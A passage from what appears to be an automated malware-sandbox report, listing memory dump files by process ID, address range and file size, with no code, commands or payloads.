                            • memory/2768-706-0x0000000000FD0000-0x00000000012EA000-memory.dmp

                              Filesize

                              3.1MB

                            • memory/2768-680-0x0000000000FD0000-0x00000000012EA000-memory.dmp

                              Filesize

                              3.1MB

                            • memory/2768-21-0x0000000000FD0000-0x00000000012EA000-memory.dmp

                              Filesize

                              3.1MB

                            • memory/2768-23-0x0000000000FD0000-0x00000000012EA000-memory.dmp

                              Filesize

                              3.1MB

                            • memory/2768-22-0x0000000000FD1000-0x0000000000FFF000-memory.dmp

                              Filesize

                              184KB

                            • memory/2768-319-0x0000000000FD0000-0x00000000012EA000-memory.dmp

                              Filesize

                              3.1MB

                            • memory/2768-26-0x0000000000FD0000-0x00000000012EA000-memory.dmp

                              Filesize

                              3.1MB

                            • memory/2768-49-0x0000000000FD0000-0x00000000012EA000-memory.dmp

                              Filesize

                              3.1MB

                            • memory/2768-636-0x0000000000FD0000-0x00000000012EA000-memory.dmp

                              Filesize

                              3.1MB

                            • memory/2768-222-0x0000000000FD0000-0x00000000012EA000-memory.dmp

                              Filesize

                              3.1MB

                            • memory/2768-50-0x0000000000FD0000-0x00000000012EA000-memory.dmp

                              Filesize

                              3.1MB

                            • memory/2768-67-0x00000000065A0000-0x000000000722B000-memory.dmp

                              Filesize

                              12.5MB

                            • memory/2768-511-0x0000000000FD0000-0x00000000012EA000-memory.dmp

                              Filesize

                              3.1MB

                            • memory/2768-69-0x00000000065A0000-0x000000000722B000-memory.dmp

                              Filesize

                              12.5MB

                            • memory/2768-70-0x0000000000FD0000-0x00000000012EA000-memory.dmp

                              Filesize

                              3.1MB

                            • memory/2768-600-0x0000000000FD0000-0x00000000012EA000-memory.dmp

                              Filesize

                              3.1MB

                            • memory/2768-575-0x0000000000FD0000-0x00000000012EA000-memory.dmp

                              Filesize

                              3.1MB

                            • memory/2768-85-0x00000000065A0000-0x000000000722B000-memory.dmp

                              Filesize

                              12.5MB

                            • memory/2768-540-0x0000000000FD0000-0x00000000012EA000-memory.dmp

                              Filesize

                              3.1MB

                            • memory/2768-154-0x00000000065A0000-0x000000000722B000-memory.dmp

                              Filesize

                              12.5MB

                            • memory/2772-263-0x00000000022C0000-0x00000000022C8000-memory.dmp

                              Filesize

                              32KB

                            • memory/3048-181-0x000000001B730000-0x000000001BA12000-memory.dmp

                              Filesize

                              2.9MB

                            • memory/3048-182-0x0000000001FF0000-0x0000000001FF8000-memory.dmp

                              Filesize

                              32KB

                            • memory/3336-573-0x00000000001E0000-0x000000000063E000-memory.dmp

                              Filesize

                              4.4MB

                            • memory/3380-699-0x000000013F4C0000-0x000000013F950000-memory.dmp

                              Filesize

                              4.6MB

                            • memory/3392-700-0x0000000140000000-0x0000000140770000-memory.dmp

                              Filesize

                              7.4MB

                            • memory/3392-698-0x0000000140000000-0x0000000140770000-memory.dmp

                              Filesize

                              7.4MB

                            • memory/3392-696-0x0000000140000000-0x0000000140770000-memory.dmp

                              Filesize

                              7.4MB

                            • memory/3408-475-0x0000000000340000-0x0000000000600000-memory.dmp

                              Filesize

                              2.8MB

                            • memory/3408-476-0x0000000000340000-0x0000000000600000-memory.dmp

                              Filesize

                              2.8MB

                            • memory/3420-574-0x0000000000FF0000-0x000000000147B000-memory.dmp

                              Filesize

                              4.5MB

                            • memory/3660-502-0x000000013FD60000-0x00000001401F0000-memory.dmp

                              Filesize

                              4.6MB

                            • memory/3668-516-0x0000000140000000-0x0000000140770000-memory.dmp

                              Filesize

                              7.4MB

                            • memory/3668-493-0x0000000140000000-0x0000000140770000-memory.dmp

                              Filesize

                              7.4MB

                            • memory/3668-496-0x0000000140000000-0x0000000140770000-memory.dmp

                              Filesize

                              7.4MB

                            • memory/3668-499-0x0000000140000000-0x0000000140770000-memory.dmp

                              Filesize

                              7.4MB

                            • memory/3668-500-0x0000000140000000-0x0000000140770000-memory.dmp

                              Filesize

                              7.4MB

                            • memory/3668-497-0x0000000140000000-0x0000000140770000-memory.dmp

                              Filesize

                              7.4MB

                            • memory/3668-494-0x0000000140000000-0x0000000140770000-memory.dmp

                              Filesize

                              7.4MB

                            • memory/3668-498-0x0000000140000000-0x0000000140770000-memory.dmp

                              Filesize

                              7.4MB

                            • memory/3668-517-0x0000000140000000-0x0000000140770000-memory.dmp

                              Filesize

                              7.4MB

                            • memory/3668-495-0x0000000140000000-0x0000000140770000-memory.dmp

                              Filesize

                              7.4MB

                            • memory/3668-514-0x0000000140000000-0x0000000140770000-memory.dmp

                              Filesize

                              7.4MB

                            • memory/3668-515-0x00000000000B0000-0x00000000000D0000-memory.dmp

                              Filesize

                              128KB

                            • memory/3712-510-0x0000000002890000-0x0000000002898000-memory.dmp

                              Filesize

                              32KB

                            • memory/3712-509-0x000000001B5D0000-0x000000001B8B2000-memory.dmp

                              Filesize

                              2.9MB

                            • memory/3968-571-0x0000000000060000-0x0000000000CA4000-memory.dmp

                              Filesize

                              12.3MB

                            • memory/3968-557-0x0000000000060000-0x0000000000CA4000-memory.dmp

                              Filesize

                              12.3MB

                            • memory/3988-705-0x000000001B620000-0x000000001B902000-memory.dmp

                              Filesize

                              2.9MB